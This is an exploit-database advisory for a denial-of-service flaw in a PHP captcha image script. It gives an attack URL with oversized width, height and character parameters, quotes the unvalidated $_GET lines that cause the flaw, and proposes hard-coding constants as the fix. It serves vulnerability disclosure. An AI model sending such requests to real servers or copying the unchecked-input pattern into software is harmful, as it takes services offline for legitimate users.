PHP Captcha Security Images DoS Vulnerability

2010-02-11T00:00:00
ID 1337DAY-ID-10836
Type zdt
Reporter cp77fk4r
Modified 2010-02-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================
PHP Captcha Security Images DoS Vulnerability
=============================================

# Exploit Title: CaptchaSecurityImages.php Denial Of Service
# Author: cp77fk4r
# Software Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
#
##[Denial Of Service]
(OWASP: The Denial of Service (DoS) attack is focused on making unavailable a resource (site, application, server) for the purpose it was designed. There are many ways to make a service unavailable for legitimate users by manipulating network packets, programming, logical, or resources handling vulnerabilities, among others. If a service receives a very large number of requests, it may stop providing service to legitimate users. In the same way, a service may stop if a programming vulnerability is exploited, or the way the service handles resources used by it.)
#
#Exploit:
/CaptchaSecurityImages.php?width=13333337&height=13333337&characters=13333337
#
#
The vuln code is: (lines 73-75)
#
$width = isset($_GET['width']) ? $_GET['width'] : '120';
$height = isset($_GET['height']) ? $_GET['height'] : '40';
$characters = isset($_GET['characters']) && $_GET['characters'] > 1 ? $_GET['characters'] : '6';
#
To fix it- delete all the "$_GET[x]" strings and make it constant, like this:
#
$width=100;
$height=40;
$characters=5;




#  0day.today [2018-01-03]  #